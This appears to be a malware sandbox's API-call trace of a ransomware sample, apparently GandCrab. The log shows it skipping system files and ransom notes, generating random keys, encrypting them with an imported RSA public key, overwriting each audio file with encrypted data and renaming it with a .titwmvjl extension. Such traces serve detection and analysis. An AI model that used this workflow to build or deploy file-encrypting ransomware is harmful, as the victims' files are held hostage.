[0093.196] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="uPotTL6igW.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav" [0093.196] lstrlenW (lpString=".titwmvjl") returned 9 [0093.196] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav") returned 56 [0093.196] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.196] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav.titwmvjl") returned 65 [0093.196] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav") returned 56 [0093.196] lstrlenW (lpString=".wav") returned 4 [0093.196] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.196] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0093.196] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0093.196] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.197] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav") returned 56 [0093.197] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav") returned 56 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="desktop.ini") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="autorun.inf") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="ntuser.dat") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="iconcache.db") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="bootsect.bak") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="boot.ini") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="ntuser.dat.log") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="thumbs.db") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="CRAB-DECRYPT.html") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="ntldr") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="NTDETECT.COM") returned 1 [0093.197] lstrcmpiW (lpString1="uPotTL6igW.wav", lpString2="Bootfont.bin") returned 1 [0093.197] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav") returned 56 [0093.197] lstrlenW (lpString=".wav") returned 4 [0093.197] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.197] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0093.197] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.197] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.197] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\upottl6igw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.198] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.198] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.199] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.199] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.200] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.200] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.200] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.200] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.201] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.201] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.201] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.201] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.201] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.202] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.202] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.202] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.202] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.202] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.203] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.203] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5032f8) returned 1 [0093.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.203] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.204] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.204] GetLastError () returned 0x0 [0093.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.204] CryptDestroyKey (hKey=0x5032f8) returned 1 [0093.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.205] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.205] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.205] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5035b8) returned 1 [0093.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.206] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.206] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.206] GetLastError () returned 0x0 [0093.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.207] CryptDestroyKey (hKey=0x5035b8) returned 1 [0093.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.207] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.207] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.207] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.208] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x13c03, lpOverlapped=0x0) returned 1 [0093.222] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffec3fd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.222] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13c03, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x13c03, lpOverlapped=0x0) returned 1 [0093.223] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.223] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.225] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.229] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.229] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.229] CloseHandle (hObject=0x2b4) returned 1 [0093.230] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\upottl6igw.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\uPotTL6igW.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\upottl6igw.wav.titwmvjl"), dwFlags=0x1) returned 1 [0093.231] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.231] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0093.231] FindClose (in: hFindFile=0x5031f8 | out: hFindFile=0x5031f8) returned 1 [0093.232] CloseHandle (hObject=0x2ac) returned 1 [0093.232] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.232] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0093.232] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0093.232] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\TITWMVJL-DECRYPT.txt" [0093.232] lstrlenW (lpString=".titwmvjl") returned 9 [0093.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\TITWMVJL-DECRYPT.txt") returned 48 [0093.232] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.233] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 57 [0093.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\TITWMVJL-DECRYPT.txt") returned 48 [0093.235] lstrlenW (lpString=".txt") returned 4 [0093.235] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.235] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0093.235] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0093.235] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\TITWMVJL-DECRYPT.txt") returned 48 [0093.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\TITWMVJL-DECRYPT.txt") returned 48 [0093.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0093.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0093.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0093.235] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.235] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.235] lstrcmpW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2=".") returned 1 [0093.236] lstrcmpW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="..") returned 1 [0093.236] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="ttZsnsx-5qu7lA.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3" [0093.236] lstrlenW (lpString=".titwmvjl") returned 9 [0093.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3") returned 46 [0093.236] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.236] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3.titwmvjl") returned 55 [0093.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3") returned 46 [0093.236] lstrlenW (lpString=".mp3") returned 4 [0093.236] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.236] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0093.236] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0093.236] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3") returned 46 [0093.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3") returned 46 [0093.236] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="desktop.ini") returned 1 [0093.236] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="autorun.inf") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="ntuser.dat") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="iconcache.db") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="bootsect.bak") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="boot.ini") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="ntuser.dat.log") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="thumbs.db") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="ntldr") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="NTDETECT.COM") returned 1 [0093.237] lstrcmpiW (lpString1="ttZsnsx-5qu7lA.mp3", lpString2="Bootfont.bin") returned 1 [0093.237] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3") returned 46 [0093.237] lstrlenW (lpString=".mp3") returned 4 [0093.237] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.237] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0093.237] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.237] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.238] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ttzsnsx-5qu7la.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0093.238] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.238] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0093.239] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.239] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0093.240] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.240] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.240] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.240] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0093.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.240] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.240] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.241] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0093.241] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.241] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.241] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.241] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0093.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.242] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.242] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.242] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0093.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.243] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503438) returned 1 [0093.243] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.243] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0093.243] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.243] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0093.243] GetLastError () returned 0x0 [0093.243] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.243] CryptDestroyKey (hKey=0x503438) returned 1 [0093.243] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.243] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.244] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0093.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.244] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503278) returned 1 [0093.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.244] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0093.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.245] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0093.245] GetLastError () returned 0x0 [0093.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.245] CryptDestroyKey (hKey=0x503278) returned 1 [0093.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.245] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.245] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.245] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.245] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x178ae, lpOverlapped=0x0) returned 1 [0093.258] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffe8752, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.258] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x178ae, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x178ae, lpOverlapped=0x0) returned 1 [0093.261] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.261] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0093.262] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.266] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.266] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.266] CloseHandle (hObject=0x2ac) returned 1 [0093.267] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ttzsnsx-5qu7la.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\ttZsnsx-5qu7lA.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ttzsnsx-5qu7la.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0093.268] 